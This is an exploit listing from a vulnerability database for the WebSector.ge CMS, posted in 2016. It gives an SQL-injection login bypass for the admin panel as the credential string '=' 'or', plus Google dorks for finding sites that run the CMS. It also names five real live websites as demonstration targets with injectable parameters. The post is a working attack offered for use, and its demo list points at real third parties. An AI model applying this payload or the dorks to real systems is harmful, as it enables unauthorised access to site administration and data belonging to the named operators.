WebSector.ge CMS SQL injection & Admin Page Bypass

2016.12.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: SQL injection & Admin Page Bypass |[+] |[+] Exploit Author : Azerbaycanli Hacker #By.SaMiR |[+] |[+] Vendor Homepage: http://websector.ge/ |[+] |[+] Google Dork:intext:"websector.ge" inurl:php?id= |[+] Google Dork:საიტი დამზადებულია WebSector.ge-ის მიერ |[+] |[+] Tested on: Windows 7 |[+] |[+] Date: 06/12/2016 |[+] |--------------------------------------------------------------| |[+] Exploit : |[+] |[+] Username: '=' 'or' |[+] Password: '=' 'or' |[+] |[+] Admin Url :- |[+] |[+] http://Site.ge/admin/ |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+]http://www.turugeorgia.com/index.php?page=tour_single&id=34 |[+]http://ertobaplus.ge/index.php?page=product&catid=35 |[+]http://orbita.ge/index.php?page=pages&id=6 |[+]http://www.vitamin.ge/index.php?page=projects_single&id=95 |[+]http://www.hauck-georgien.com/index.php?page=products&cat=4 |--------------------------------------------------------------| |[+] Thanks: CXSECURITY.COM Team's Members |[+] Azərbaycan Güclü Dövlətdir və Onun Güclü Ordusu Var! |[+] Url : http://pagebin.com/G2V7JVOW |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top